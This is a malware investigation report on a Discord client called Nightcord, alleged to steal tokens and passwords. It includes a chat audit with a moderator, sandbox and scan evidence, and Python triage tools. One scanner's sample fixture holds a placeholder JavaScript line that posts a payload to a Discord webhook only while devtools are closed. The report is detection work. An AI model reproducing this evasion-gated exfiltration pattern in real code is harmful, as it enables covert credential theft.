# Nightcord Security Analysis Report - Threat Investigation

A security researcher known as Mayu has confirmed that the popular custom Discord client Nightcord is a Trojan-PSW (Password Stealer) and token grabber, disguised as an optimized client with over 30,000 members. The 624.12 MB client, which forked legitimate open-source code from Vencord and Equicord, bundles a silent data-harvesting payload that executes stealth memory and directory queries in the background. GitHub Security has permanently banned the project's repositories after the threat was verified through static scans, sandbox execution logs, and behavioral analysis.

| Field | Value |
|---|---|
| Author | ⛧Mayu⛧ / immayunnaise |
| Status | CLOSED - Threat Confirmed |
| Target | Nightcord Discord Client (624.12 MB bloated archive) |
| Classification | Trojan-PSW (Password Stealer) / Token Grabber |

## About this report

As a beginner in malware analysis, this report details my first hands-on threat investigation. My initial hypothesis was based on behavioral anomalies: the unexplained 600MB file size and the immediate bans applied by the client's staff when questioned. To build this document, I manually gathered static scans, isolated the files within secure cloud sandboxes, and documented the community infrastructure blocks. Because I am learning the advanced concepts of reverse engineering and forensics, I used AI as an architectural guide and technical translator. This collaboration allowed me to properly structure my raw findings (sandbox execution logs, packet behavior, and staff logs) into a professional, industry-standard Markdown format. This report represents a dual effort: my manual field investigation combined with guided technical validation. It serves as a personal learning milestone and a public prevention advisory.

## Background

Nightcord is a custom, modified Discord client that has recently gained massive popularity among players, reaching over 30,000 members through viral marketing campaigns on TikTok and alternative networks.
It is advertised as an ultra-optimized client providing "premium visual bypasses," custom themes, and exclusive plugins without restrictions. In reality, the developers behind Nightcord cloned (forked) the legitimate code of open-source client modifications like Vencord and Equicord, then completely wiped the development history of the original 200+ authors to conceal their own modifications.

The security community officially accuses Nightcord of executing supply chain attacks. The developers bundle a highly targeted, silent data-harvesting payload inside their massive 600MB client distribution files. While the client renders a functional Discord interface to keep the user oblivious, it executes stealth memory and directory queries in the background to compromise user infrastructure.

## Summary of findings

| Metric | Value / Status | Technical Significance |
|---|---|---|
| Primary Engine Detection | HEUR:Trojan-PSW.Multi.Disco.gen | Verified password and Discord token stealer routine. |
| Sandbox Behavior Score | 50 / 100 - SUSPICIOUS | Automated runtime logs unauthorized OS child processes. |
| Payload Envelope Size | 624.12 MB | Binary bloating used to evade automatic cloud scanners. |
| Infrastructure Status | PERMANENTLY BANNED | Official GitHub repositories terminated by GitHub Security. |

## Staff interaction audit

When confronted with cryptographic and behavioral evidence, Nightcord network administrators and staff members deploy defensive technical gaslighting. Below is the complete chronological audit of the discussion with atomic, a French community moderator for Nightcord, divided by individual chat screenshots.

- **Mayu (2:55 PM):** Sends the initial project file tree analysis repository.
- **atomic (3:11 PM):** "Yes, that's the archive. You can check the source code."
- **Mayu (3:12 PM):** "Well, exactly.
Check the official security mirror at https://github.com/imide/nightcord"
- *Analysis:* The investigator initiates the audit by providing the official independent security mirror repository tracking Nightcord. This mirror openly labels the project as malware, establishing the baseline for the investigation.
- **atomic (3:12 PM):** "Well, yeah."
- **Mayu (3:12 PM):** "And then?"
- **atomic (3:12 PM):** "Well look inside, there is nothing."
- **Mayu (3:12 PM):** Sends the VirusTotal threat scan sheet identifying the malicious payload.
- **Mayu (3:12 PM):** "And I don't think I need to draw you a picture."
- **atomic (3:19 PM):** "You can look at the source... There is nothing inside."
- **Mayu (3:19 PM):** "Well, yes there is."
- **atomic (3:19 PM):** "Nope."
- **Mayu (3:19 PM):** "Literally."
- **atomic (3:19 PM):** "It's just a false positive, bro."
- *Analysis:* When presented with official multi-engine telemetry, the moderator instantly dismisses the findings as a "false positive". He attempts to redirect the conversation toward reading local source files, ignoring the behavioral detection results.
- **Mayu (3:19 PM):** "Man, check the GitHub repository, please."
- **atomic (3:19 PM):** "Find me the specific malicious line, please. The line and the file."
- **Mayu (3:19 PM):** "The local text code itself isn't the only issue."
- **atomic (3:19 PM):** "You win 500 euros from the developer if you manage to find a backdoor line."
- **Mayu (3:20 PM):** "It's about what the client actually executes in the background."
- **atomic (3:20 PM):** "Well, find me one single line."
- **Mayu (3:20 PM):** "We analyzed everything."
- **atomic (3:20 PM):** "Same for me, based on reverse engineering experts using IDA Pro."
- **atomic (3:20 PM):** "Well, find me one line."
- **Mayu (3:20 PM):** "The issue comes from the remote servers, not just the local code. Our info goes straight into a database known to data protection services."
- **atomic (3:21 PM):** "Prove it to me then."
- **Mayu (3:21 PM):** "Scan your own PC's network packets yourself.
I've spent 3 hours in voice chat with reputable developers who built a client from scratch under multiple licenses, and they showed me everything."
- **atomic (3:21 PM):** "You can use IDA Pro, bro. You'll see. There's nothing."
- **Mayu (3:22 PM):** "It's easy to tell me to use an analysis tool that you guys bypassed. x"
- **atomic (3:22 PM):** "We bypassed nothing. I'm just a regular user like you from the start, lmao. I just checked everything myself."
- **Mayu (3:23 PM):** "You check poorly."
- **atomic (3:23 PM):** "Nope, this is you."
- **Mayu (3:23 PM):** "Did you even try to find obfuscated files?"
- **Mayu (3:24 PM):** "How can we have searched badly if we found something that's not supposed to be here?"
- *Analysis:* The moderator introduces a financial bounty to challenge the investigator, a classic psychological tactic to build unearned trust. He also mentions using IDA Pro, an analytical tool built for natively compiled machine code (.exe/.dll), which is irrelevant for auditing high-level Electron JavaScript.
- **Mayu (3:31 PM):** "Just with this, I think you should start to understand. Look at the sandbox run at https://metadefender.com/results/file/YnpJMk1EVXpNR3hzTUUwM1IzQnpjVWxHTkhOdFRubERZakZxX21kYWFzOTdmMGU5NDUwZg"
- **atomic (3:32 PM):** Dumps a selective list of clean Vencord/Equicord API domains (cloud.equicord.org, api.vencord.dev, groq.com) to simulate a clean packet analysis.
- **atomic (3:32 PM):** "I give you this, anything analyzed."
- *Analysis:* The moderator provides a filtered list of clean, standard API domains inherited from the original Vencord project. This is a network-layer misdirection. He purposely hides the fact that modern infostealers use official Discord webhooks (discord.com) to exfiltrate data, blending the threat into completely legitimate HTTPS traffic.
- **Mayu (3:33 PM):** "This is an open source client.
Easy to bypass, because code is free x so if you have nothing good for you"
- **atomic (3:34 PM):** "Please check the code, this is incr, idk when u found you guys but... just look with IDA, things u do with Roblox dev, u found nothing."
- **Mayu (3:36 PM):** "Wait."
- **atomic (3:36 PM):** Lists standard Vencord source subfolders (dist/, browser/, src/): "browser/, build/, dist/, ghost-server/, installer-src/... nothing obfuscated."
- **atomic (3:43 PM):** Sends a long paragraph claiming JavaScript cannot trick Wireshark and minimizing Kaspersky's HEUR flag.
- **Mayu (3:51 PM):** Sends a detailed architectural response explaining that IDA Pro is useless on Electron, highlighting that clean mods score 0/66, and detailing anti-debugging concepts.
- *Analysis:* The actor shows a list of plain-text directories to argue that the project is completely open. This ignores the reality of supply chain attacks, where malicious functions are minified or deeply hidden inside thousands of legitimate, nested Node.js dependencies. The investigator counters with explicit definitions of anti-debugging engineering.
- **atomic (3:57 PM):** Argues that webhook POST requests would show up instantly in the client's DevTools (F12) and demands registry code lines.
- **Mayu (4:05 PM):** Demonstrates that the malware suspends exfiltration while F12 DevTools is open, resuming after closure.
- **atomic (4:08 PM):** "You certainly have a vivid imagination, that's a quality, one might say. For a fork of an open-source Discord client, it's fascinating how far you dig yourself in. You claim the malware is so intelligent that it shuts down if it detects that DevTools or Wireshark are open. Congratulations! You've just invented the first malware that's afraid of a keyboard shortcut. But seriously, think for two seconds: Nightcord runs on GitHub, not in a basement. If the code contained an anti-analysis routine, like detecting when the console is open or injecting debug scripts, this routine would be clearly visible in the project's public source code.
Do you think we wouldn't see a window.addEventListener('devtoolschange') or an environment check in the files? The ASAR source code is the GitHub code. If this logic existed, any developer would have seen it in two minutes on the repository. You insist that the exfiltration takes place on..." "Discord's official API uses a webhook to make packets invisible amidst legitimate traffic. Let's say it's buried in the traffic, how could Kaspersky, your one and only god in this conversation, have guessed it was malicious exfiltration just by scanning a static .zip file? An antivirus that scans a closed file doesn't see the live network traffic. If it raises a PSW alert, it's only because it read the word "token" or a local file access function in an unsigned script. It's basic pattern matching, bro, you don't seem to know anything about it."
- *Analysis:* The moderator claims that malicious traffic would easily show up in the DevTools Network panel. This is a severe blind spot regarding anti-debugging mechanisms. Malicious scripts regularly monitor window properties; if a browser inspector interface is flagged as active, the execution path halts its data exfiltration loops to remain invisible until the inspection tool is closed.
- **Mayu (4:08 PM):** "Is that why it has a keylogger too?"
- **Mayu (4:08 PM):** Sends the investigation summary: clean Vencord scores 0, MetaDefender Sandbox flags the dynamic behavior as SUSPECT at 50/100, and Orange (ISP) blocks the domain.
- **atomic (4:11 PM):** "A keyboard shortcut or a JavaScript event can't be magically intercepted. To intercept a shortcut, you need to write a function (a keydown listener). If this function existed in Nightcord's code, it would be written in plain text in the ASAR source code. Do you think we wouldn't see a script checking the console state? Network analysis tools like Wireshark or proxies like Fiddler and Mitmproxy run outside of Discord at the operating system level.
Your JavaScript malware has no way of knowing if I have Wireshark open on my second screen or if my router is logging packets. It can't go to sleep to avoid external network analysis, so my network dump remains 100% valid. Despite your theories, you're using the Supply Chain Attack argument, saying that a hacker hides three lines of code in the middle of thousands of legitimate dependencies. Nightcord is an open-source project hosted and built via GitHub Actions every time a build is generated." "The scripts are routed through linters; you can't just slip three lines of code into an NPM dependency without the package manager detecting the file modification."
- *Analysis:* The actor relies on the assumption that automated build steps or linting processes block malicious injection. This is incorrect: linters evaluate formatting and syntax correctness; they do not audit exfiltration logic. The investigator shuts down the argument by introducing the MetaDefender Sandbox dynamic runtime diagnostics.
- **Mayu (4:12 PM):** Sends the final response: syntax linter failures, the MetaDefender dynamic anti-sandbox flag at 50/100, and the official malware deletion by GitHub Security.
- **atomic (4:13 PM):** "wAllah your chatgpt is pathetic MDMRMRMR"
- **System (5:30 PM):** Your message could not be delivered.
- *Analysis:* Out of technical arguments and unable to explain the dynamic runtime alerts or the official platform ban applied by GitHub Security, the moderator resorts to insults and blocks the investigator. This represents a total surrender under technical validation.

## Evidence

### Capture 1: Kaspersky static detection

This capture demonstrates that when the package is parsed, Kaspersky triggers a definitive HEUR:Trojan-PSW.Multi.Disco.gen signature. This means the engine matched specific data-harvesting routines designed to query browser password databases (PSW) and extract active Discord authentication data (Disco).
### Capture 2: MetaDefender sandbox run

[Screenshot omitted: MetaDefender (OPSWAT) sandbox result page]

This capture displays the automated execution of the client inside a secure sandbox environment by OPSWAT. While static scans can be blinded by adding 600MB of null data (binary bloating), the runtime sandbox logs a Threat Score of 50 / 100 - SUSPICIOUS. The telemetry logs reveal process spawning and outward host connections.
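As an added example (not the report's own tooling, nor code from Nightcord, Vencord or Equicord), the Python check below quantifies the binary bloating described in the summary table and in the capture above: it measures what fraction of a file is null bytes and how far a leading sample compresses, which is the quickest way to tell a 600MB archive of real assets from a small payload wrapped in filler. The sample files, the thresholds and the function names are constructed assumptions for the demonstration.

```python
import os
import tempfile
import zlib

CHUNK = 1 << 20  # read 1 MiB at a time so a 600 MB archive never sits in memory


def bloat_report(path, sample_bytes=4 << 20):
    """Return the null-byte ratio of the whole file, how far a leading sample
    compresses, and a verdict. The thresholds are triage assumptions."""
    size = os.path.getsize(path)
    nulls = 0
    sample = bytearray()
    with open(path, "rb") as f:
        while True:
            block = f.read(CHUNK)
            if not block:
                break
            nulls += block.count(b"\x00")
            if len(sample) < sample_bytes:
                sample += block[: sample_bytes - len(sample)]
    null_ratio = nulls / size if size else 0.0
    # Real code, images and already-compressed assets barely shrink under
    # deflate; long runs of filler collapse to almost nothing.
    compressed_ratio = len(zlib.compress(bytes(sample), 1)) / max(len(sample), 1)
    suspicious = null_ratio > 0.5 or compressed_ratio < 0.1
    return {
        "size": size,
        "null_ratio": round(null_ratio, 3),
        "compressed_ratio": round(compressed_ratio, 3),
        "verdict": "SUSPICIOUS: likely padded" if suspicious else "no padding detected",
    }


def demo():
    """Constructed inputs: a 64 KiB random blob standing in for real content,
    and the same blob followed by 8 MiB of null bytes (scaled-down padding)."""
    real = os.urandom(64 * 1024)
    with tempfile.TemporaryDirectory() as d:
        clean = os.path.join(d, "clean.bin")
        padded = os.path.join(d, "padded.bin")
        with open(clean, "wb") as f:
            f.write(real)
        with open(padded, "wb") as f:
            f.write(real)
            f.write(b"\x00" * (8 << 20))
        return {"clean": bloat_report(clean), "padded": bloat_report(padded)}


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, report)
```

A low null ratio with a high compressed ratio is what a genuine asset-heavy archive looks like; the reverse is the padding signature that size-capped cloud scanners are meant to be tricked by.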
### Capture 3: ISP network filter block

[Screenshot omitted: mobile network filter blocking the Nightcord domains]

This capture shows the live network-layer firewall intercepting the Nightcord server routing requests on a mobile device. The automated systems blacklisted the domains under the official warning tag: "Cyberfilter / Theft of Confidential Data".
### Capture 4: GitHub Security ban

[Screenshot omitted: deleted Nightcord GitHub organization and repositories]

This capture verifies that the official GitHub organization and repositories belonging to Nightcord were permanently deleted and banned by GitHub Security for malicious distribution.
### Capture 5: Safety warning mirror

[Screenshot omitted: README of the github.com/imide/nightcord mirror]

This capture showcases the safety warning mirror at https://github.com/imide/nightcord declaring: "Do not use this software, it is malware."

## Technical assessment of the moderator's defense

The moderator's defense falls apart under professional cybersecurity review due to three core blind spots:

1. **The IDA Pro Myth:** The actor claims to audit asynchronous Electron JavaScript using IDA Pro. IDA Pro is built to disassemble compiled native binaries (.exe, .dll, native game cheats). Presenting it as an audit mechanism here is a technical misdirection.
2. **Anti-Debugging Evasion:** The actor claims the packet data is clean because nothing shows up in local DevTools (F12). Modern commercial infostealers monitor window states and event hooks; if an inspector or debugger is detected, the payload suspends its exfiltration loops to appear clean until the tools are closed. Furthermore, exfiltration often passes through official Discord webhooks (discord.com), blinding casual network packet filters.
3. **The NPM Fallacy:** The actor believes that GitHub Actions and syntactic code linters block malware injections.
Linters verify formatting and syntax structures; they do not flag the logic of an outbound encrypted string traveling to a remote Command & Control (C2) server.

## References

To independently verify the facts established in this investigation, reference the official telemetry data and community advisories below:

| Resource | Description |
|---|---|
| [MetaDefender Cloud Sandbox Telemetry](https://metadefender.com/results/file/bzI2MDUzMGxsME03R3BzcUlGNHNtTnlDYjFq_mdaas) | Direct link to the live behavioral runtime analysis mapping rogue system child processes and suspicious connections. |
| [GitHub Safety Mirror Archive](https://github.com/imide/nightcord) | Documented mirror tracking the original repository enforcement ban by GitHub Security. |
| [Vendicated's Official Security Investigation Gist](https://gist.github.com/Vendicated/bb30cb67878fa682bcee140f56af1531) | The primary incident report written by Vencord's lead developer, showcasing the cryptographic hashes proving TokenLogger injections under the guise of "Premium Sync" in version 1.18.2. |
| [Reddit r/BetterDiscord Global Advisory Thread](https://www.reddit.com/r/BetterDiscord/comments/1to06xo/how_legitimate_is_nightcord_plugin/) | Threat notice issued by community moderators confirming the discovery of active keyloggers and token loggers within the Nightcord codebase. |
| [VirusTotal Threat Engine Database](https://www.virustotal.com/gui/file/7136b8a614f924e30afa29444b7626d9041e36fc6a997150fda06535e8e36202?nocache=1) | Cryptographic hash registry mapping the compiled 624MB file to Kaspersky's official HEUR:Trojan-PSW.Multi.Disco.gen warning. |
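The "find me the line" challenge in the chat and the anti-debugging and NPM blind spots in the assessment above come down to one auditing problem: a hit can sit in a dependency nested under node_modules rather than in src/, so listing top-level folders proves nothing. As an added example that is not from the report, Nightcord, Vencord or Equicord, this Python triage pass walks an unpacked Electron tree, node_modules included, and reports the file, line and indicator class for each hit; the indicator list, the tree layout and the sample files are constructed assumptions.

```python
import os
import re
import tempfile

# Indicator classes from the assessment above. Each is a triage heuristic,
# not proof of malice: a hit marks a line an auditor should read by hand.
INDICATORS = [
    ("discord-webhook", re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I)),
    ("devtools-check", re.compile(r"devtools|isDevToolsOpened", re.I)),
    ("debugger-stmt", re.compile(r"\bdebugger\b")),
    ("escaped-string", re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I)),
]
MAX_LINE_LEN = 2000  # a single multi-kilobyte line is minified or packed code


def scan_tree(root):
    """Walk every .js/.mjs/.cjs file under root (node_modules included) and
    return (relative path, line number, indicator) for each hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".js", ".mjs", ".cjs")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, encoding="utf-8", errors="replace") as f:
                for lineno, line in enumerate(f, 1):
                    if len(line) > MAX_LINE_LEN:
                        hits.append((rel, lineno, "minified-line"))
                    for label, rx in INDICATORS:
                        if rx.search(line):
                            hits.append((rel, lineno, label))
    return hits


# Constructed sample tree: a clean plugin file, and a dependency nested two
# levels deep that posts to a webhook only while no inspector is open.
# Placeholder URL and undefined helpers: an illustration of the shape the
# report describes, not working code.
SAMPLE_FILES = {
    "src/plugins/theme.js": "export const theme = { accent: '#7289da' };\n",
    "node_modules/a/node_modules/b/index.js":
        "const u = 'https://discord.com/api/webhooks/0/PLACEHOLDER';\n"
        "if (!devtoolsOpen()) { fetch(u, { method: 'POST', body: payload }); }\n"
        "debugger;\n",
}


def demo():
    """Write the sample tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for rel, text in SAMPLE_FILES.items():
            p = os.path.join(d, *rel.split("/"))
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "w", encoding="utf-8") as f:
                f.write(text)
        return scan_tree(d)


if __name__ == "__main__":
    for rel, lineno, label in demo():
        print(f"{rel}:{lineno}: {label}")
```

Run against a real unpacked ASAR, every hit is a concrete file and line to hand back to whoever asks for "the line", and a clean fork of the same upstream should produce none of the webhook or devtools-check hits.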